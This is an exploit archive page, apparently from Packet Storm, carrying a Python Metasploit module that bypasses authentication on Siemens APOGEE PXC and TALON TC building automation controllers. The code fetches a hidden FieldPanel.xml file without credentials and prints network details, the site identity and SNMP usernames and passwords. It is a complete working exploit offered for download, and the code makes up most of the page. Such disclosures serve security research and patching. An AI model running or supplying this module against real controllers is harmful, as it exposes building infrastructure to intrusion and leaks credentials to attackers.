exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Siemens APOGEE PXC / TALON TC Authentication Bypass

Siemens APOGEE PXC / TALON TC Authentication Bypass
Posted Oct 28, 2022
Authored by RoseSecurity

APOLOGEE is a Python script and Metasploit module that enumerates a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers and TALON TC BACnet Automation Controllers. With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to access hidden directories in the web server. All versions prior to 3.5 are affected.

tags | exploit, web, python
advisories | CVE-2017-9947
SHA-256 | 9cdea8ef198269714420f4181480f5f779bae0a4ceba444e0d250e3b4071220a

Siemens APOGEE PXC / TALON TC Authentication Bypass

Change Mirror Download
#!/usr/bin/env python3

# -*- coding: utf-8 -*-
# 2022-05-23

# Standard Modules
from metasploit import module

# Extra Dependencies
dependencies_missing = False
try:
import logging
import requests
import requests
import xmltodict
import xml.etree.ElementTree as ET
import socket
import struct
import requests
except ImportError:
dependencies_missing = True


# Metasploit Metadata
metadata = {
'name': 'Siemens BACnet Field Panel Path Traversal',
'description': '''
This module exploits a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5), and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to enumerate hidden directories in the web server.
''',
'authors': [
'RoseSecurity',
],
'date': '2022-05-23',
'license': 'MSF_LICENSE',
'references': [
{'type': 'url', 'ref': 'https://sid.siemens.com/v/u/A6V10304985'},
{'type': 'cve', 'ref': 'https://nvd.nist.gov/vuln/detail/CVE-2017-9946'},
],
'type': 'single_scanner',
'options': {
'rhost': {'type': 'string', 'description': 'Target address', 'required': True, 'default': None},
}
}

def run(args):
module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
if dependencies_missing:
logging.error('Module dependency (requests) is missing, cannot continue')
return

try:
# Download Hidden XML File
r = requests.get('http://{}/{}'.format(args['rhost'], '/FieldPanel.xml'), verify=False)

# Convert to Readable Format
xml_doc = r.content
root = ET.fromstring(xml_doc)

# Parse XML for Sensitive Data
module.log("Remote Site ID: " + root[18].text)
module.log("Building Level Network Name: " + root[26].text)
module.log("Site Name: " + root[27].text)
module.log("Hostname: " + root[28].text)
ip_addr = int(root[30].text, 16)
module.log("IP Address: " + socket.inet_ntoa(struct.pack(">L", ip_addr)))
gw_addr = int(root[32].text, 16)
gw_addr = str(socket.inet_ntoa(struct.pack(">L", gw_addr)))
module.log("Gateway IP Address: " + gw_addr[::-1])
module.log("Maximum Transmission Size: " + root[57].text)
module.log("BACnet Device Name: " + root[60].text)
module.log("BACnet UDP Port: " + root[62].text)
module.log("Device Location: " + root[63].text)
module.log("Device Description: " + root[64].text)
module.log("Device Barcode: " + root[88].text)
module.log("Device Revision String: " + root[104].text)
module.log("Device Firmware: " + root[105].text)
module.log("Panel Key Name: " + root[109].text)
module.log("SNMP Username: " + root[148].text)
module.log("SNMP Private Password: " + root[149].text)
module.log("SNMP Authorization Password: " + root[150].text)

# Determine Running Services
if int(root[48].text) == 1:
module.log("Telnet Enabled")
else:
module.log("Telnet Disabled")

if int(root[84].text) == 1:
module.log("Wireless Enabled")
else:
module.log("Wireless Disabled")

if int(root[103].text) == 3:
module.log("Webserver Enabled")
else:
module.log("Webserver Disabled")

except requests.exceptions.RequestException as e:
logging.error('{}'.format(e))
return




if __name__ == '__main__':
module.run(metadata, run)


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close